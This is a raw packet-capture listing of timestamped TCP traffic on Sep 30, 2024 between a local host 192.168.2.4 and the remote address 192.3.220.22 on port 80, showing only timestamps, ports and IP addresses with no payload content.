                                          Sep 30, 2024 13:59:43.923127890 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.923170090 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.923176050 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.923182964 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.923213959 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.923271894 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.923283100 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.923293114 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.923302889 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.923321962 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.923324108 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.923335075 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.923343897 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.923346043 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.923357964 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.923368931 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.923405886 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.923671007 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.923682928 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.923692942 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.923726082 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.923741102 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.923755884 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.923769951 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.923780918 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.923793077 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.923798084 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.923820972 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.923850060 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.923861027 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.923871994 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.923882961 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.923893929 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.923902035 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.923906088 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.923929930 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.923963070 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.924005032 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.924021006 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.924031973 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.924041986 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.924048901 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.924053907 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.924063921 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.924074888 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.924082994 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.924084902 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.924098969 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.924115896 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.924137115 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.924571991 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.924614906 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.924616098 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.924629927 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.924657106 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.924680948 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.924695969 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.924707890 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.924719095 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.924730062 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.924745083 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.924776077 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.924854040 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.924865007 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.924875021 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.924885988 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.924896002 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.924901009 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.924906969 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.924916983 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.924926043 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.924937010 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.924948931 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.924957037 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.924958944 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.924978018 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.924978971 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.924988985 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.924997091 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.925004959 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.925019026 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.925034046 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.925060987 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.925081968 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.925595999 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.925607920 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.925618887 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.925643921 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.925653934 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.925653934 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.925664902 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.925677061 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.925683975 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.925704956 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.925724983 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.925823927 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.925837040 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.925848007 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.925858974 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.925874949 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.925880909 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.925892115 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.925899982 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.925901890 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.925914049 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.925934076 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.925935030 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.925946951 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.925957918 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.925957918 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.925970078 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.925981045 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.925982952 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.925993919 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.926011086 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.926038980 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.926534891 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.926557064 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:43.926579952 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:43.926609993 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.012470961 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.012495995 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.012506962 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.012517929 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.012530088 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.012541056 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.012562037 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.012583017 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.012586117 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.012595892 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.012607098 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.012619019 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.012629986 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.012653112 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.012665987 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.012675047 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.012701035 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.012722969 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.012728930 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.012738943 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.012763023 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.012772083 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.012774944 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.012785912 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.012794971 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.012816906 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.012849092 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.012876034 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.012887955 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.012900114 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.012922049 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.012944937 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.012950897 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.012957096 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.012967110 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.012985945 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.013026953 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.013052940 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.013066053 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.013077021 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.013092995 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.013094902 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.013106108 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.013128042 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.013173103 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.013289928 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.013348103 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.013377905 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.013422012 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.013422966 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.013436079 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.013474941 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.013479948 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.013492107 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.013501883 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.013513088 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.013521910 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.013525963 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.013551950 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.013586998 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.013622046 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.013633013 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.013643980 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.013654947 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.013664961 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.013667107 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.013675928 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.013706923 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.013710022 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.013719082 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.013731956 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.013748884 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.013760090 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.013766050 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.013775110 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.013801098 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.013807058 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.013819933 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.013820887 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.013830900 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.013840914 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.013850927 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.013880968 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.017494917 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.017544031 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.017580986 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.017626047 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.017628908 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.017640114 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.017678022 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.017692089 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.017708063 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.017718077 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.017729044 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.017735004 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.017740965 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.017771959 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.017785072 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.017796040 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.017805099 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.017807961 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.017818928 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.017829895 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.017836094 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.017839909 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.017853975 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.017874002 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.017899036 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.017930984 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.017942905 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.017966032 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.017975092 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.018001080 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.018006086 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.018021107 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.018032074 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.018042088 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.018043995 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.018074989 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.018102884 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.018105984 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.018116951 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.018126965 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.018137932 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.018146038 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.018148899 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.018160105 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.018170118 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.018171072 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.018205881 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.018224955 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.018368959 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.018379927 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.018390894 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.018423080 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.018450022 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.018454075 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.018462896 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.018472910 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.018485069 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.018491030 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.018520117 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.018549919 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.018584967 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.018595934 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.018610001 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.018621922 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.018632889 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.018635988 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.018642902 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.018652916 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.018663883 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.018668890 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.018678904 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.018687963 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.018707991 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.018728018 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.018804073 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.018834114 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.018846989 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.018853903 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.018874884 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.018889904 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.018898964 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.018908978 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.018920898 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.018932104 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.018938065 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.018963099 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.018990993 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.019010067 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.019020081 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.019031048 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.019042015 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.019052982 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.019052982 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.019064903 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.019076109 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.019078970 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.019143105 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.103015900 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.103033066 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.103053093 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.103066921 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.103079081 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.103081942 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.103101969 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.103104115 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.103115082 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.103120089 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.103126049 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.103137016 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.103147984 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.103153944 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.103158951 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.103180885 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.103183031 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.103192091 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.103202105 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.103204012 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.103213072 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.103223085 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.103224993 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.103235006 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.103249073 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.103290081 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.103380919 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.103398085 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.103410006 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.103425026 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.103431940 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.103435040 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.103442907 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.103454113 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.103456020 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.103462934 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.103467941 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.103493929 CEST4973780192.168.2.4192.3.220.22
                                          Sep 30, 2024 13:59:44.103502989 CEST8049737192.3.220.22192.168.2.4
                                          Sep 30, 2024 13:59:44.103513956 CEST8049737192.3.220.22192.168.2.4
